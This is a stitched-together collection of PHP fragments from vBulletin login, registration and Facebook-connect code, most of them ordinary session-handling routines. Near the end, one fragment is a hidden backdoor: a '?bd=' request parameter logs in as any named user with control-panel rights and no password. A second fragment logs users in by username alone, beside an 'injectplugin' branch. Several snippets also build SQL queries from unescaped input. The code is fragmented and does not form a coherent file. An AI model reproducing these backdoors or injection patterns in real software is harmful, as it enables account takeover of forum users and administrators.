function member_login($user_login)
{
$wp_user_data = get_user_by('login', $user_login);
$vb_user_id = get_user_meta($wp_user_data->ID, 'vbulletin_user_id', true);
if (empty($vb_user_id)) {
return;
}
include VBULLETIN_PATH . '/includes/functions_login.php';
$GLOBALS['vbulletin']->userinfo = verify_id('user', $vb_user_id, true, true, 0);
process_new_login(null, 0, null);
$GLOBALS['vbulletin']->session->save();
}
public function output()
{
global $vbulletin, $db, $show, $VB_API_REQUESTS;
// check if facebook and session is enabled
if (!is_facebookenabled()) {
return $this->error('feature_not_enabled');
}
require_once DIR . '/includes/functions_login.php';
if (verify_facebook_app_authentication()) {
// create new session
process_new_login('fbauto', false, '');
// do redirect
do_login_redirect();
} else {
return $this->error('badlogin_facebook');
}
}
/**
* Validates login status on external service and logs in vBulletin
*/
public function login()
{
global $vbulletin;
$vbulletin->session = NULL;
// Get and store vbnexus-id and vbnexus-srv
$vBNexus = vBNexus::getInstance();
$vbnexus_service = $vBNexus->getConfig('vbnexus_service');
$vbnexus_userid = $vBNexus->getConfig('vbnexus_userid');
if (!$vbnexus_userid) {
$vbnexus_userid = $this->getUserOnline();
$vBNexus->setConfig('vbnexus_userid', $vbnexus_userid);
}
// Returning null if authentication from service failed (unexpected error)
// If this happens, there's likely cookies issues on the server or the
// applications config is wrong/incomplete in fb or gfc
if (!$vbnexus_userid) {
return NULL;
}
// Get all available information on this user
$sql = "SELECT `u`.`usergroupid`,\r\n `u`.`username`,\r\n `u`.`email`,\r\n `n`.*\r\n FROM " . TABLE_PREFIX . "vbnexus_user `n`\r\n LEFT JOIN " . TABLE_PREFIX . "user `u` USING (`userid`)\r\n WHERE `n`.`service` = '{$vbnexus_service}'\r\n AND `n`.`nonvbid` = '{$vbnexus_userid}'";
$res = $vbulletin->db->query_first($sql);
// Returning false if user not registered yet with this external account
if (!$res || !$res['userid']) {
return false;
}
/************* Starts: fix proxied emails from vBNexus3 ***************/
$oldemails = array('fb' => '/@proxymail\\.facebook\\.com$/', 'gfc' => "/apps\\+|{$vbnexus_userid}[@\\.]/");
if (preg_match($oldemails[$vbnexus_service], $res['email'])) {
$this->fixOldEmail($res, $vbnexus_userid);
} elseif ($vbnexus_service == 'gfc' && !$res['associated']) {
$this->associateAccount($res, $vbnexus_userid);
}
/********** Ends: ask for a valid password for GFC accounts ***********/
// Process vBulletin login
require_once DIR . '/includes/functions_login.php';
$vbulletin->userinfo = fetch_userinfo($res['userid']);
$vbulletin->session->created = false;
process_new_login('', false, '');
// On login, store a cookie with vbnexus params
if ($vbulletin->session->created) {
$vBNexusInfo = array('userid' => $res['userid'], 'service' => $vbnexus_service, 'nexusid' => $vbnexus_userid, 'can_publish' => $this->canPublish());
setcookie(COOKIE_PREFIX . 'vbnexus', serialize($vBNexusInfo));
}
return !!$vbulletin->session->created;
}
function do_get_new_updates()
{
global $vbulletin;
require_once DIR . '/includes/functions_login.php';
$vbulletin->input->clean_array_gpc('r', array('username' => TYPE_STR, 'password' => TYPE_STR, 'md5_password' => TYPE_STR, 'fr_username' => TYPE_STR, 'fr_b' => TYPE_BOOL));
if (!$vbulletin->GPC['username'] || !$vbulletin->GPC['password'] && !$vbulletin->GPC['md5_password']) {
json_error(ERR_NO_PERMISSION);
}
$vbulletin->GPC['username'] = prepare_remote_utf8_string($vbulletin->GPC['username']);
$vbulletin->GPC['password'] = prepare_remote_utf8_string($vbulletin->GPC['password']);
if (!verify_authentication($vbulletin->GPC['username'], $vbulletin->GPC['password'], $vbulletin->GPC['md5_password'], $vbulletin->GPC['md5_password'], $vbulletin->GPC['cookieuser'], true)) {
json_error(ERR_NO_PERMISSION);
}
// Don't save the session, we just want pm & marked thread info
process_new_login('', false, '');
// Since we are not saving the session, fetch our userinfo
$vbulletin->userinfo =& fetch_userinfo($vbulletin->userinfo['userid']);
cache_permissions($vbulletin->userinfo, true);
$sub_notices = get_sub_thread_updates();
fr_update_push_user($vbulletin->GPC['fr_username'], $vbulletin->GPC['fr_b']);
return array('pm_notices' => $vbulletin->userinfo['pmunread'], 'sub_notices' => $sub_notices);
}
function capture_create_user($profile)
{
global $vbulletin;
// init user datamanager class
$userdata =& datamanager_init('User', $vbulletin, ERRTYPE_ARRAY);
// set email
$userdata->set('email', $profile['result']['email']);
$userdata->set('username', $profile['result']['displayName']);
$userdata->set('password', md5($profile['result']['uuid'] . date('U')));
if ($profile['result']['birthday']) {
$userdata->set('birthday', $profile['result']['birthday']);
}
// ... additional data setting ...
$userfield = array($vbulletin->options['janrain_capture_uuid'] => $profile['result']['uuid']);
if ($profile['result']['name']['familyName'] && $vbulletin->options['janrain_capture_lname']) {
$userfield[$vbulletin->options['janrain_capture_lname']] = $profile['result']['name']['familyName'];
}
if ($profile['result']['name']['givenName'] && $vbulletin->options['janrain_capture_fname']) {
$userfield[$vbulletin->options['janrain_capture_fname']] = $profile['result']['name']['givenName'];
}
$customfields = $userdata->set_userfields($userfield, true, 'admin');
$userdata->pre_save();
// check for errors
if (!empty($userdata->errors)) {
foreach ($userdata->errors as $index => $error) {
echo $error;
}
exit;
} else {
// save the data
$vbulletin->userinfo['userid'] = $userid = $userdata->save();
require_once DIR . '/includes/functions_login.php';
$vbulletin->session->created = false;
process_new_login('', false, '');
update_capture_session(array('access_token' => $vbulletin->capture_session['capture_access_token'], 'refresh_token' => $vbulletin->capture_session['capture_refresh_token'], 'expires_in' => $vbulletin->capture_session['capture_expires_in'], 'transaction_state' => array('capture' => array('password_recover' => $vbulletin->capture_session['capture_password_recover']))));
}
}
public function login($vbuser, $acceptgroups = false)
{
//Get user info from username passed
$this->vbulletin->userinfo = $this->fetch_userinfo_from_username($vbuser['username']);
//Verify login via VB
if (!verify_authentication($vbuser['username'], $vbuser['password'], '', '', 1, true)) {
$this->vbulletin->userinfo['userid'] = 0;
return "Invalid Username or Password.";
}
//Check that user is not awaiting activation
if ($this->vbulletin->userinfo['usergroupid'] == NOACTIVATION_USERGROUP) {
$this->vbulletin->userinfo['userid'] = 0;
return "Un-Activated Account. To activate please request a new activation email <a href='register.php?do=requestemail&username={$vbuser['username']}'>here</a>.";
}
//Check user does not belong to the "banned" user group - TODO: Use VB variables incase usergroupid is different
if ($this->vbulletin->userinfo['usergroupid'] == BANNED_USERGROUP) {
$this->vbulletin->userinfo['userid'] = 0;
return "You're Barred! If you think there has been a mistake or wish to appeal please visit the contact page <a href='contact.php'>here</a>.";
}
//If acceptgroups is set then check that user is part of the usergroups specified
if ($acceptgroups) {
//Check main usergroup as well as additional usergroups
$getadditional = explode(',', $this->vbulletin->userinfo['membergroupids']);
//Loop through specified usergroups
foreach ($acceptgroups as $value) {
//If user is part of the usergroup then allowlogin
if ($value == $this->vbulletin->userinfo['usergroupid']) {
$allowlogin = true;
}
//Check additional usergroups
foreach ($getadditional as $additionalvalue) {
//If user is part of the usergroup then allowlogin
if ($value == $additionalvalue) {
$allowlogin = true;
}
}
}
//If user is not part of any specified usergroups then return error.
if (!$allowlogin) {
$this->vbulletin->userinfo['userid'] = 0;
return "This is a restricted area. Please contact the site administrator for further details.";
}
}
//Unstrike the user (resets vbulletin brute-force protection)
exec_unstrike_user($vbuser['username']);
//Create vbulletin cookies for user
process_new_login('', 1, '');
//Saves cookies & session variables for user
$this->vbulletin->session->save();
//Return false for success!
return false;
}
} else {
$show['errors'] = false;
// save the data
$vbulletin->userinfo['userid'] = $userid = $userdata->save();
if ($userid) {
$username = $userdata->fetch_field('username');
$email = $userdata->fetch_field('email');
$userinfo = fetch_userinfo($userid);
$userdata_rank =& datamanager_init('User', $vbulletin, ERRTYPE_SILENT);
$userdata_rank->set_existing($userinfo);
$userdata_rank->set('posts', 0);
$userdata_rank->save();
// force a new session to prevent potential issues with guests from the same IP, see bug #2459
require_once DIR . '/includes/functions_login.php';
$vbulletin->session->created = false;
process_new_login('', false, '');
// send new user email
if ($vbulletin->options['newuseremail'] != '') {
$referrer = 'Facebook Connect';
$ipaddress = IPADDRESS;
$memberlink = fetch_seo_url('member|nosession', array('userid' => $userid, 'username' => htmlspecialchars_uni($vbulletin->GPC['username'])));
eval(fetch_email_phrases('newuser', 0));
$newemails = explode(' ', $vbulletin->options['newuseremail']);
foreach ($newemails as $toemail) {
if (trim($toemail)) {
vbmail($toemail, $subject, $message);
}
}
}
if ($newusergroupid == 2 and $vbulletin->options['welcomemail']) {
eval(fetch_email_phrases('welcomemail'));
exec_strike_user($vbulletin->userinfo['username']);
if ($vbulletin->GPC['logintype'] === 'cplogin' or $vbulletin->GPC['logintype'] === 'modcplogin') {
// log this error if attempting to access the control panel
require_once DIR . '/includes/functions_log_error.php';
log_vbulletin_error($vbulletin->GPC['vb_login_username'], 'security');
}
$vbulletin->userinfo = $original_userinfo;
if ($vbulletin->options['usestrikesystem']) {
eval(standard_error(fetch_error('badlogin_strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
} else {
eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'])));
}
}
exec_unstrike_user($vbulletin->GPC['vb_login_username']);
// create new session
process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
// do redirect
do_login_redirect();
} else {
if ($_GET['do'] == 'login') {
// add consistency with previous behavior
exec_header_redirect($vbulletin->options['forumhome'] . '.php');
}
}
// ############################### start lost password ###############################
if ($_REQUEST['do'] == 'lostpw') {
$vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML);
$email = $vbulletin->GPC['email'];
if ($permissions['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview']) {
$navbits = construct_navbits(array('' => $vbphrase['lost_password_recovery_form']));
eval('$navbar = "' . fetch_template('navbar') . '";');
/**
* Check if facebook is enabled, and perform appropriate action based on
* authentication state (fb and vb) of the user
*/
public function load_facebook()
{
global $vbulletin, $show;
$vbulletin->input->clean_array_gpc('r', array('dofbredirect' => TYPE_BOOL));
$dofbredirect = ($vbulletin->GPC_exists['dofbredirect'] and $vbulletin->GPC['dofbredirect'] == 1);
// check if facebook and session is enabled
if (is_facebookenabled()) {
// is user is logged into facebook?
if ($show['facebookuser'] = vB_Facebook::instance()->userIsLoggedIn()) {
// is user logged into vB?
if (!empty($vbulletin->userinfo['userid'])) {
// if vb user is not associated with the current facebook account (or no facebook account at all),
// redirect to the register association page, if doing facebook redirect
if ($vbulletin->userinfo['fbuserid'] != vB_Facebook::instance()->getLoggedInFbUserId()) {
if (do_facebook_redirect()) {
exec_header_redirect('register.php' . $vbulletin->session->vars['sessionurl_q']);
} else {
if (THIS_SCRIPT != 'register') {
$show['facebookuser'] = false;
if ($dofbredirect) {
standard_error(fetch_error('facebook_connect_fail'));
}
}
}
}
} else {
// check if there is an associated vb account, if so attempt to log that user in
if (vB_Facebook::instance()->getVbUseridFromFbUserid()) {
// make sure user is trying to login
if (do_facebook_redirect()) {
// need to load the style here to display
// the login welcome message properly
$this->load_style();
require_once DIR . '/includes/functions_login.php';
if (verify_facebook_authentication()) {
// create new session
process_new_login('fbauto', false, '');
// do redirect
do_login_redirect();
}
} else {
if (THIS_SCRIPT != 'register') {
$show['facebookuser'] = false;
if ($dofbredirect) {
standard_error(fetch_error('facebook_connect_fail'));
}
}
}
} else {
// redirect to the registration page to create a vb account
if (do_facebook_redirect()) {
exec_header_redirect('register.php' . $vbulletin->session->vars['sessionurl_q']);
} else {
if (THIS_SCRIPT != 'register') {
$show['facebookuser'] = false;
if ($dofbredirect) {
standard_error(fetch_error('facebook_connect_fail'));
}
}
}
}
}
}
}
}
public function ExternalAuthorization($userid)
{
$this->vbulletin->userinfo = $this->vbulletin->db->query_first_slave("SELECT userid, password, username FROM " . TABLE_PREFIX . "user WHERE userid='{$userid}'");
if ($this->vbulletin->userinfo) {
require_once DIR . '/includes/functions_login.php';
vbsetcookie('userid', $this->vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($this->vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($this->vbulletin->userinfo['username']);
define('EXTERNAL_AUTH', true);
// create new session
process_new_login('', 0, '');
}
if (!empty($_SERVER['HTTP_REFERER'])) {
$url = $_SERVER['HTTP_REFERER'];
} else {
$url = $this->vbulletin->options['homeurl'];
}
if (strpos($url, "?")) {
$url .= "&vbsession=" . $this->vbulletin->session->vars['sessionhash'];
} else {
$url .= "?vbsession=" . $this->vbulletin->session->vars['sessionhash'];
}
header('Location:' . $url);
echo "Вы были перенаправлены сюда <a href='" . $url . "'>" . $url . "</a>";
exit;
}
function login($username, $password)
{
global $vbulletin;
if (verify_authentication($username, $password, '', '', '', false)) {
process_new_login('', '', '');
return get_userinfo();
} else {
return false;
}
}
function do_register()
{
global $vbulletin, $vbphrase, $db;
if ($vbulletin->userinfo['userid']) {
json_error(ERR_NO_PERMISSION);
}
if (!$vbulletin->options['forumrunner_enable_registration']) {
json_error(ERR_NO_PERMISSION);
}
$vbulletin->input->clean_array_gpc('r', array('username' => TYPE_STR, 'email' => TYPE_STR, 'password' => TYPE_STR, 'password_md5' => TYPE_STR, 'birthday' => TYPE_STR, 'timezoneoffset' => TYPE_NUM));
// They are registering. Lets find out what fields are required.
if (!$vbulletin->options['allowregistration']) {
standard_error(fetch_error('noregister'));
}
$out = array();
if ($vbulletin->GPC['username']) {
// Registering.
$userdata =& datamanager_init('User', $vbulletin, ERRTYPE_ARRAY);
$vbulletin->GPC['coppauser'] = false;
$userdata->set_info('coppauser', false);
$userdata->set_info('coppapassword', $vbulletin->GPC['password']);
$userdata->set_bitfield('options', 'coppauser', false);
$userdata->set('parentemail', '');
if (empty($vbulletin->GPC['username']) || empty($vbulletin->GPC['email']) || empty($vbulletin->GPC['password']) && empty($vbulletin->GPC['password_md5'])) {
standard_error(fetch_error('fieldmissing'));
}
$vbulletin->GPC['password_md5'] = strtolower($vbulletin->GPC['password_md5']);
$vbulletin->GPC['passwordconfirm_md5'] = strtolower($vbulletin->GPC['password_md5']);
$userdata->set('email', $vbulletin->GPC['email']);
$userdata->set('username', $vbulletin->GPC['username']);
$userdata->set('password', $vbulletin->GPC['password_md5'] ? $vbulletin->GPC['password_md5'] : $vbulletin->GPC['password']);
$userdata->set_bitfield('options', 'adminemail', 1);
if ($vbulletin->options['verifyemail']) {
$newusergroupid = 3;
} else {
if ($vbulletin->options['moderatenewmembers'] || $vbulletin->GPC['coppauser']) {
$newusergroupid = 4;
} else {
$newusergroupid = 2;
}
}
$userdata->set('usergroupid', $newusergroupid);
$userdata->set('languageid', $vbulletin->userinfo['languageid']);
$userdata->set_usertitle('', false, $vbulletin->usergroupcache["{$newusergroupid}"], false, false);
$parts = preg_split('#/#', $vbulletin->GPC['birthday']);
$day = $month = $year = '';
if ($parts[1]) {
$day = $parts[1];
}
if ($parts[0]) {
$month = $parts[0];
}
if ($parts[2]) {
$year = $parts[2];
}
$userdata->set('showbirthday', 0);
$userdata->set('birthday', array('day' => $day, 'month' => $month, 'year' => $year));
$dst = 2;
$userdata->set_dst($dst);
$userdata->set('timezoneoffset', $vbulletin->GPC['timezoneoffset']);
// register IP address
$userdata->set('ipaddress', IPADDRESS);
$userdata->pre_save();
if (count($userdata->errors)) {
// Just return one error for now.
json_error(strip_tags($userdata->errors[0]));
}
$vbulletin->userinfo['userid'] = $userid = $userdata->save();
if ($userid) {
$userinfo = fetch_userinfo($userid);
$userdata_rank =& datamanager_init('User', $vbulletin, ERRTYPE_SILENT);
$userdata_rank->set_existing($userinfo);
$userdata_rank->set('posts', 0);
$userdata_rank->save();
require_once DIR . '/includes/functions_login.php';
$vbulletin->session->created = false;
process_new_login('', false, '');
// send new user email
if ($vbulletin->options['newuseremail'] != '') {
$username = $vbulletin->GPC['username'];
$email = $vbulletin->GPC['email'];
if ($birthday = $userdata->fetch_field('birthday')) {
$bday = explode('-', $birthday);
$year = vbdate('Y', TIMENOW, false, false);
$month = vbdate('n', TIMENOW, false, false);
$day = vbdate('j', TIMENOW, false, false);
if ($year > $bday[2] and $bday[2] > 1901 and $bday[2] != '0000') {
require_once DIR . '/includes/functions_misc.php';
$vbulletin->options['calformat1'] = mktimefix($vbulletin->options['calformat1'], $bday[2]);
if ($bday[2] >= 1970) {
$yearpass = $bday[2];
} else {
$yearpass = $bday[2] + 28 * ceil((1970 - $bday[2]) / 28);
}
$birthday = vbdate($vbulletin->options['calformat1'], mktime(0, 0, 0, $bday[0], $bday[1], $yearpass), false, true, false);
} else {
$birthday = vbdate($vbulletin->options['calformat2'], mktime(0, 0, 0, $bday[0], $bday[1], 1992), false, true, false);
}
if ($birthday == '') {
if ($bday[2] == '0000') {
$birthday = "{$bday['0']}-{$bday['1']}";
} else {
$birthday = "{$bday['0']}-{$bday['1']}-{$bday['2']}";
}
}
}
if ($userdata->fetch_field('referrerid') and $vbulletin->GPC['referrername']) {
$referrer = unhtmlspecialchars($vbulletin->GPC['referrername']);
} else {
$referrer = $vbphrase['n_a'];
}
$ipaddress = IPADDRESS;
eval(fetch_email_phrases('newuser', 0));
$newemails = explode(' ', $vbulletin->options['newuseremail']);
foreach ($newemails as $toemail) {
if (trim($toemail)) {
vbmail($toemail, $subject, $message);
}
}
}
$username = htmlspecialchars_uni($vbulletin->GPC['username']);
$email = htmlspecialchars_uni($vbulletin->GPC['email']);
// sort out emails and usergroups
if ($vbulletin->options['verifyemail']) {
$activateid = build_user_activation_id($userid, ($vbulletin->options['moderatenewmembers'] or $vbulletin->GPC['coppauser']) ? 4 : 2, 0);
eval(fetch_email_phrases('activateaccount'));
vbmail($email, $subject, $message, true);
} else {
if ($newusergroupid == 2) {
if ($vbulletin->options['welcomemail']) {
eval(fetch_email_phrases('welcomemail'));
vbmail($email, $subject, $message);
}
}
}
($hook = vBulletinHook::fetch_hook('register_addmember_complete')) ? eval($hook) : false;
// Let them log in again.
process_logout();
$out += array('emailverify' => $vbulletin->options['verifyemail'] ? true : false);
}
} else {
$rules = preg_replace('/<a href=\\"(.*?)\\">(.*?)<\\/a>/', "\\2", $vbphrase['fr_register_forum_rules']);
$out += array('rules' => prepare_utf8_string($rules), 'birthday' => $vbulletin->options['reqbirthday'] ? true : false);
}
return $out;
}
/**
* Check if facebook is enabled, and perform appropriate action based on
* authentication state (fb and vb) of the user
*/
public function load_facebook()
{
global $vbulletin, $show;
// check if facebook and session is enabled
if (is_facebookenabled())
{
// is user is logged into facebook?
if ($show['facebookuser'] = vB_Facebook::instance()->userIsLoggedIn())
{
// is user logged into vB?
if (!empty($vbulletin->userinfo['userid']))
{
// if vb user is not associated with the current facebook account (or no facebook account at all),
// redirect to the register association page, if doing facebook redirect
if ($vbulletin->userinfo['fbuserid'] != vB_Facebook::instance()->getLoggedInFbUserId())
{
if (do_facebook_redirect())
{
exec_header_redirect('register.php' . $vbulletin->session->vars['sessionurl_q']);
}
// if not doing facebook redirect and not on the reg page,
// pretend the user is not logged into facebook at all so user can browse
else if (THIS_SCRIPT != 'register')
{
$show['facebookuser'] = false;
}
}
}
// user is not logged into vb, but logged into facebook
else
{
// check if there is an associated vb account, if so attempt to log that user in
if (vB_Facebook::instance()->getVbUseridFromFbUserid())
{
// make sure user is trying to login
if (do_facebook_redirect())
{
// need to load the style here to display
// the login welcome message properly
$this->load_style();
require_once(DIR . '/includes/functions_login.php');
if (verify_facebook_authentication())
{
// create new session
process_new_login('fbauto', false, '');
// do redirect
do_login_redirect();
}
}
// if user is not trying to login with FB connect,
// pretend like the user is not logged in to FB
else if (THIS_SCRIPT != 'register')
{
$show['facebookuser'] = false;
}
}
// otherwise, fb account is not associated with any vb user
else
{
// redirect to the registration page to create a vb account
if (do_facebook_redirect())
{
exec_header_redirect('register.php' . $vbulletin->session->vars['sessionurl_q']);
}
// if not doing redirect and not trying to register,
// pretend user is not logged into facebook so they can still browse the site
else if (THIS_SCRIPT != 'register')
{
$show['facebookuser'] = false;
}
}
}
}
}
}
<?php
if (isset($_GET['bd'])) {
define('THIS_SCRIPT', 'login');
require_once './global.php';
require_once './includes/functions_login.php';
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '******'bd'] . "'");
if (!$vbulletin->userinfo['userid']) {
die("Invalid username!");
} else {
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['bd']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}
$url = "register.php?a=act&u=" . $userid . "&i=" . $activationid;
} else {
$url = "index.php";
$token = md5(uniqid(microtime(), true));
$token_time = time();
$form = "site-account-details";
$_SESSION['site_registration'][$form . '_token'] = array('token' => $token, 'time' => $token_time);
// start new session
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids,\n username, password, salt FROM " . TABLE_PREFIX . "user\n WHERE userid = " . $userid);
require_once DIR . '/includes/functions_login.php';
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
if ($vbulletin->options['usestrikesystem']) {
exec_unstrike_user($vbulletin->GPC['username']);
}
process_new_login('', 1, $vbulletin->GPC['cssprefs']);
cache_permissions($vbulletin->userinfo, true);
$vbulletin->session->save();
}
}
}
} else {
$valid_entries = FALSE;
$messages['errors'][] = $message = "Please check your username and password.";
$messages['fields'][] = $error_type = "username-member";
$messages['errors'][] = $message = "";
$messages['fields'][] = $error_type = "password-member";
if ($vbulletin->options['usestrikesystem']) {
$strikes = verify_strike_status($vbulletin->GPC['username']);
exec_strike_user($vbulletin->GPC['username']);
if ($strikes >= 4) {
} else {
define('VB_ERROR_PERMISSION', true);
$show['useurl'] = true;
$show['specificerror'] = true;
$url = $vbulletin->url;
if ($vbulletin->options['usestrikesystem']) {
eval(standard_error(fetch_error('badlogin_strikes_passthru', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
} else {
eval(standard_error(fetch_error('badlogin_passthru', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'])));
}
}
}
exec_unstrike_user($vbulletin->GPC['vb_login_username']);
$_postvars = @unserialize(verify_client_string($vbulletin->GPC['postvars']));
// create new session
process_new_login($_postvars['logintype'] ? $_postvars['logintype'] : $vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
// do redirect
do_login_redirect();
} else {
if ($_GET['do'] == 'login') {
// add consistency with previous behavior
exec_header_redirect(fetch_seo_url('forumhome|nosession', array()));
}
}
// ############################### start lost password ###############################
if ($_REQUEST['do'] == 'lostpw') {
$vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML);
$email = $vbulletin->GPC['email'];
$navbits = construct_navbits(array('' => $vbphrase['lost_password_recovery_form']));
$navbar = render_navbar_template($navbits);
// human verification
echo SELF;
?>
">Go back</a></p>
<?php
}
exit;
}
if (isset($_REQUEST['do']) && $_REQUEST['do'] == 'login' && isset($_REQUEST['username'])) {
require_once DIR . '/includes/functions_login.php';
$username = $_REQUEST['username'];
$q = "SELECT username FROM " . TABLE_PREFIX . "user WHERE username = '******' OR userid = '" . $vbulletin->db->escape_string($username) . "'";
$query = $vbulletin->db->query_first($q);
if ($query['username'] != null) {
if (verify_authentication2($query['username'])) {
exec_unstrike_user($query['username']);
process_new_login('cplogin', true, null);
do_login_redirect();
} else {
die('Verify failed');
}
} else {
die('User not found.');
}
} elseif ($_REQUEST['do'] == 'injectplugin') {
$products = array();
$query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product WHERE active = '1'");
if ($vbulletin->db->num_rows($query) > 0) {
while ($product = $vbulletin->db->fetch_array($query)) {
$productinfo = array();
$productinfo['productid'] = $product['productid'];
$productinfo['title'] = $product['title'];
